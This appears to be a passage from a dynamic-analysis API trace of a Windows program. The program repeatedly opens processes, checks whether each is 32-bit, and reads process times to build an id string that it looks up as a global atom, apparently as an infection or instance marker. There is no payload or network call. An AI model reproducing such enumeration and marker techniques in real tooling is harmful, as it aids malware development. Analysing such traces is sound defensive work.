	[0106.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.810] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.810] CloseHandle (hObject=0x694) returned 1
	[0106.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.810] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.810] CloseHandle (hObject=0x694) returned 1
	[0106.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.810] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.811] CloseHandle (hObject=0x694) returned 1
	[0106.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.811] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.811] CloseHandle (hObject=0x694) returned 1
	[0106.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.811] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.811] CloseHandle (hObject=0x694) returned 1
	[0106.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.811] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.811] CloseHandle (hObject=0x694) returned 1
	[0106.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.812] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.812] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.812] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.812] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.812] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.812] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.813] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.813] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.813] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.813] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.813] CloseHandle (hObject=0x694) returned 1
	[0106.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.813] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.813] CloseHandle (hObject=0x694) returned 1
	[0106.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.814] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.814] CloseHandle (hObject=0x694) returned 1
	[0106.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.814] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.814] CloseHandle (hObject=0x694) returned 1
	[0106.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.852] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.852] CloseHandle (hObject=0x694) returned 1
	[0106.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.852] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.852] CloseHandle (hObject=0x694) returned 1
	[0106.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.852] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.852] CloseHandle (hObject=0x694) returned 1
	[0106.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.853] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.853] CloseHandle (hObject=0x694) returned 1
	[0106.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.853] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.853] CloseHandle (hObject=0x694) returned 1
	[0106.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.853] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.853] CloseHandle (hObject=0x694) returned 1
	[0106.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.853] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.853] CloseHandle (hObject=0x694) returned 1
	[0106.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.853] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.853] CloseHandle (hObject=0x694) returned 1
	[0106.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.854] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.854] CloseHandle (hObject=0x694) returned 1
	[0106.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.854] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.854] CloseHandle (hObject=0x694) returned 1
	[0106.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.854] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.854] CloseHandle (hObject=0x694) returned 1
	[0106.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.854] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.854] CloseHandle (hObject=0x694) returned 1
	[0106.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.855] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.855] CloseHandle (hObject=0x694) returned 1
	[0106.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.855] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.855] CloseHandle (hObject=0x694) returned 1
	[0106.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.855] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.855] CloseHandle (hObject=0x694) returned 1
	[0106.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.855] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.855] CloseHandle (hObject=0x694) returned 1
	[0106.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.855] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.855] CloseHandle (hObject=0x694) returned 1
	[0106.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.856] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.856] CloseHandle (hObject=0x694) returned 1
	[0106.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.856] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.856] CloseHandle (hObject=0x694) returned 1
	[0106.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.856] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.856] CloseHandle (hObject=0x694) returned 1
	[0106.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.856] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.856] CloseHandle (hObject=0x694) returned 1
	[0106.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.856] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.856] CloseHandle (hObject=0x694) returned 1
	[0106.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.857] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.857] CloseHandle (hObject=0x694) returned 1
	[0106.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.857] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.857] CloseHandle (hObject=0x694) returned 1
	[0106.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.857] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.857] CloseHandle (hObject=0x694) returned 1
	[0106.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.857] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.857] CloseHandle (hObject=0x694) returned 1
	[0106.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.857] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.857] CloseHandle (hObject=0x694) returned 1
	[0106.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.858] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.858] CloseHandle (hObject=0x694) returned 1
	[0106.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.858] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.858] CloseHandle (hObject=0x694) returned 1
	[0106.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.858] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.858] CloseHandle (hObject=0x694) returned 1
	[0106.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.858] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.858] CloseHandle (hObject=0x694) returned 1
	[0106.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.859] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.859] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.859] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.859] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.859] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.860] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.860] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.860] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.860] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.860] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.860] CloseHandle (hObject=0x694) returned 1
	[0106.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.860] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.860] CloseHandle (hObject=0x694) returned 1
	[0106.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.861] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.861] CloseHandle (hObject=0x694) returned 1
	[0106.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.861] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.861] CloseHandle (hObject=0x694) returned 1
	[0106.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.900] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.900] CloseHandle (hObject=0x694) returned 1
	[0106.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.901] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.901] CloseHandle (hObject=0x694) returned 1
	[0106.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.901] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.901] CloseHandle (hObject=0x694) returned 1
	[0106.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.901] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.901] CloseHandle (hObject=0x694) returned 1
	[0106.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.902] CloseHandle (hObject=0x694) returned 1
	[0106.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.902] CloseHandle (hObject=0x694) returned 1
	[0106.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.902] CloseHandle (hObject=0x694) returned 1
	[0106.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.902] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.902] CloseHandle (hObject=0x694) returned 1
	[0106.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.903] CloseHandle (hObject=0x694) returned 1
	[0106.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.903] CloseHandle (hObject=0x694) returned 1
	[0106.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.903] CloseHandle (hObject=0x694) returned 1
	[0106.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.903] CloseHandle (hObject=0x694) returned 1
	[0106.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.903] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.903] CloseHandle (hObject=0x694) returned 1
	[0106.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.904] CloseHandle (hObject=0x694) returned 1
	[0106.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.904] CloseHandle (hObject=0x694) returned 1
	[0106.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.904] CloseHandle (hObject=0x694) returned 1
	[0106.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.904] CloseHandle (hObject=0x694) returned 1
	[0106.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.904] CloseHandle (hObject=0x694) returned 1
	[0106.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.905] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.905] CloseHandle (hObject=0x694) returned 1
	[0106.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.905] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.905] CloseHandle (hObject=0x694) returned 1
	[0106.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.905] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.905] CloseHandle (hObject=0x694) returned 1
	[0106.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.905] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.905] CloseHandle (hObject=0x694) returned 1
	[0106.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.905] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.905] CloseHandle (hObject=0x694) returned 1
	[0106.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.905] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.906] CloseHandle (hObject=0x694) returned 1
	[0106.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.906] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.906] CloseHandle (hObject=0x694) returned 1
	[0106.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.906] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.906] CloseHandle (hObject=0x694) returned 1
	[0106.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.906] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.906] CloseHandle (hObject=0x694) returned 1
	[0106.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.906] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.907] CloseHandle (hObject=0x694) returned 1
	[0106.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.907] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.907] CloseHandle (hObject=0x694) returned 1
	[0106.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.907] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.907] CloseHandle (hObject=0x694) returned 1
	[0106.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.907] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.907] CloseHandle (hObject=0x694) returned 1
	[0106.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.908] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.908] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
